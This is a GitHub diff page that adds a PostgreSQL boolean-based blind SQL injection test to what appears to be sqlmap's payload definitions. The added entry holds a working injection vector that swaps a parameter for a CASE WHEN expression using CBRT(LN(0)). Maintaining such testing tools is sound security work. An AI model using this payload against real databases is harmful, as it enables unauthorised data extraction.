File tree Expand file tree Collapse file tree
Expand file tree Collapse file tree Original file line number Diff line number Diff line change @@ -687,6 +687,25 @@ Formats:
687687 </details >
688688 </test >
689689
690+ <test >
691+ <title >PostgreSQL boolean-based blind - Parameter replace (CBRT(LN(0)) - original value)</title >
692+ <stype >1</stype >
693+ <level >3</level >
694+ <risk >1</risk >
695+ <clause >1,2,3</clause >
696+ <where >3</where >
697+ <vector >(CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</vector >
698+ <request >
699+ <payload >(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</payload >
700+ </request >
701+ <response >
702+ <comparison >(CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CBRT(LN(0)) END)</comparison >
703+ </response >
704+ <details >
705+ <dbms >PostgreSQL</dbms >
706+ </details >
707+ </test >
708+
690709 <test >
691710 <title >Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)</title >
692711 <stype >1</stype >
You can’t perform that action at this time.
0 commit comments